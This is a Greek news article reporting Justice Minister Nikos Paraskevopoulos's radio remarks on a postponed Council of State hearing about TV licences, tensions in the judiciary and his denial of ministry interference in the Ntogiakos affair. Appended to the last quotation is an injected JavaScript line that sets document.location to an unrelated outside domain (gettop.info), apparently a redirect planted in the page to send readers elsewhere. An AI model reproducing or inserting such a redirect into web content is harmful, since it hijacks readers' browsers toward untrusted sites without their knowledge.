Παρασκευόπουλος: Θα προτιμούσα η συνεδρίαση στο ΣτΕ για τις τηλεοπτικές άδειες να είχε γίνει

0
3

 

«Οπωσδήποτε θα προτιμούσα η δίκη να είχε διεξαχθεί αλλά το τι συμβαίνει σε μια περίπτωση ματαίωσης μιας δικασίμου δεν είναι κάτι το οποίο είναι σκοτεινό ή αόριστο, η δικονομία προβλέπει την επανεισαγωγή της δίκης και αυτή οπωσδήποτε θα προχωρήσει», δήλωσε ο υπουργός δικαιοσύνης Νίκος Παρασκευόπουλος.

Μιλώντας στον ραδιοφωνικό σταθμό Παραπολιτικά 90,1, αναφερόμενος στο κλίμα που υπάρχει στον χώρο της Δικαιοσύνης ο κ. Παρασκευόπουλος είπε:

«Σίγουρα θα ήταν πολύ προτιμότερο για τη Δικαιοσύνη να λειτουργεί μέσα σε ένα κλίμα ησυχίας και ηρεμίας, αυτό θα βοηθούσε πολύ το έργο της. Δυστυχώς πολλές φορές υπάρχουν και αντιξοότητες και οφείλει να λειτουργεί ακόμη και παρ’ όλες αυτές. Οπωσδήποτε θα προτιμούσα η προσοχή να είναι συγκεντρωμένη στα μεγάλα θέματα της Δικαιοσύνης και όχι σε πρόσκαιρες προστριβές οι οποίες μπορεί να υπάρχουν, θα προτιμούσα να είναι συγκεντρωμένη η προσοχή σε διαδικασίες, σε δομές και όχι σε πρόσωπα αλλά και έτσι προσπαθούμε να τα βγάλουμε πέρα».

Σε ό,τι αφορά στην αντιπαράθεσή του με το Ποτάμι για το θέμα του Ισίδωρου Ντογιάκου σημείωσε:

«Καταρχήν η κατηγορία δεν είναι πρωτόγνωρη, είναι κάτι το οποίο πολύ συχνά γίνεται λόγος για παρεμβάσεις του υπουργείου Δικαιοσύνης στην λειτουργία της Δικαιοσύνης, αυτές οι κατηγορίες είναι αβάσιμες. Το υπουργείο Δικαιοσύνης σε όλη τη διάρκεια της θητείας μας εδώ απέχει από το να αναμιγνύεται στην απονομή της Δικαιοσύνης. Ουδέποτε πίεσε για τη μια ή για την άλλη κατεύθυνση, όχι μόνο δεν πίεσε που αυτό έτσι κι αλλιώς δεν θα γινόταν, αλλά προσωπικά έχω αποφύγει κάθε διατύπωση, ακόμα και εκεί που έχω νομική άποψη, κάθε διατύπωση η οποία θα μπορούσε να επηρεάσει εκκρεμείς υποθέσεις προς την μια ή την άλλη κατεύθυνση. Γι’ αυτό και θεωρώ τελείως άδικο να γίνεται λόγος για παρεμβάσεις στη Δικαιοσύνη.

Σε ότι αφορά το συγκεκριμένο θέμα, το ίδιο το σύνταγμα το οποίο ως κανόνα θέτει την ανεξαρτησία της Δικαιοσύνης και την μη παρέμβαση της εκτελεστικής εξουσίας, προβλέπει ορισμένες εξαιρέσεις. Προβλέπει εξαιρέσεις διότι η Δικαιοσύνη, η κυβέρνηση δηλαδή η εκτελεστική εξουσία και η νομοθετική εξουσία στην ουσία είναι τρεις πτυχές του ίδιου οργανισμού, της πολιτείας, δεν μπορεί να είναι απολύτως ξένες.

Ένας βαθμός συνεργασίας είναι απολύτως αναγκαίος. Ως εκ τούτου προβλέπει σε ειδικές περιπτώσεις κάποιες αρμοδιότητες του υπουργείου Δικαιοσύνης που αφορούν την απονομή της Δικαιοσύνης. Αυτές κυρίως, υπάρχουν και δευτερεύουσες αλλά οι κύριες είναι η συμμέτοχη της κυβέρνησης με πρόταση του υπουργού Δικαιοσύνης στις κρίσεις των ανώτατων δικαστών και επίσης μια συμμέτοχη στην πειθαρχική εξουσία. Αυτές τις εξαιρέσεις τις προβλέπει η νομοθεσία, τις προβλέπει το σύνταγμα και είναι καθήκον μου να τις υπηρετώ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here